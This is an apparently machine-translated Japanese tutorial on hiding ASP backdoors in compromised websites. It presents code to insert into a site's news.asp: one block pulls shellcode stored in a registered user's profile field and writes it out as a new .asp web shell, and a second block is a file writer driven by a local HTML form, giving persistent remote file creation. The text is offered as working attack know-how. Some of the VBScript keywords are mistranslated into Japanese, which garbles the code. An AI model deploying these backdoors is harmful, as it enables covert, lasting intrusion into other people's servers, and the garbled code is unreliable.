はじめに: 最初のサイト管理者から、現在ではいくつかの人気のある ASP バックドアに至るまで、長い時間がかかりました。ほとんどのネットワーク管理者は、これらの古典的な Web シェルに、Haiyang、Veteran、Blue Screen などの名前を付けることができると思います。ネットワーク管理者はこれらのトロイの木馬を検索するためのキーワード検索方法を学びました。もちろん、今日の時代にバックドアを隠したい場合は、「仏は片足」という言葉があるように、いくつかのスキルを使用する必要があります。背が高い、そして私の身長は1フィートです。」
前述のように、asp トロイの木馬を画像ファイルに書き込むのが良い方法であることは否定しません。実際、画像だけでなく、mp3 ファイルや doc ファイルにも書き込まれる可能性があります。
ファイル名/パラメータ + ファイル名/パラメータをコピーしてファイル名を生成する
方法は、ファイルを非表示にするという目的を達成するために柔軟に使用できます。具体的なパラメータは、acsic コード モードでは /a、バイナリ モードでは /b です。 WebShell のアップロード方法については、あまり詳しく説明しません。WebShell とは何かについては、この記事の範囲外です。今日説明するのは、接尾辞 .mdb を付けてデータベースにバックドアを挿入する方法です。前提として、Web シェルを取得した後...
ご存知のとおり、多くのサイトでは、さまざまな情報を入力する必要があります。ユーザーは、ユーザー名、パスワード、QQ、電子メール、個人プロフィール、電話番号、連絡先情報、住所などを登録します。データベースに対応する対応するテーブル、フィールド、および値もあります。今日私がやりたいことは、ユーザーを登録して、私の個人プロフィールにシェルコードを書き、そのファイルを使用するときにそのファイルがトリガーされたときに、そのシェルコードを私の個人履歴書に戻すことです。現在のディレクトリまで。
早速、コードを見てみましょう。
<%
request("action")="Firefox" の場合
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
rs.open SQL,conn,1,3
そうでない場合は、
content=rs(bname)
それ以外
応答.write "何もありません"
終了する場合
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(コンテンツ)
txtfile.close
終了する場合
%>
上記のコードを、news.asp などのサイト上のファイルに追加します。私たちが知っている情報によると、サイトに登録した後、データベースをダウンロードして構造を確認します。私が登録した Firefox 名はユーザー テーブルにあり、その ID 値は 119 です。登録した履歴書を保存するために使用されるテーブル フィールドは jl です。
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
次に、これを使用するときに、news.asp と同じディレクトリに firefox.asp という名前の Web シェルを作成できます。上記は何千もの隠蔽方法の 1 つであると言えます。次に、別のより便利な隠蔽方法について説明します。この方法は mdb サフィックスとは関係ありません。
同様に、引き続き news.asp を変更し、相手の news.asp に次のコードを挿入します。
<%
request("action")="Firefox" の場合
n=リクエスト.フォーム("n")
c=リクエスト.フォーム("c")
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
終了する場合
%>
このコードは比較的単純で、トロイの木馬のサーバー側とみなすことができます。使用する場合は、このコードを使用します。
<HTML><ヘッド>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>Fst Firefox Technology Alliance[www.wrsky.com]</title>
<FORM アクション = http://localhost/config.asp?action ... メソッド=ポスト>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>名前:<INPUT size=50
name=n width="32"><BR><BR>シェル:<TEXTAREA name=c rows=10cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
上記のコードを変更します: "http://localhost/config.asp?action= Replace 「firefox」をサーバー アドレスに置き換え、ローカル .htm ファイルとして保存します。ローカルで開いた後、生成するファイル名、ファイルの内容、およびリモート送信を定義します。これは、バックドアを残すもう 1 つの方法です。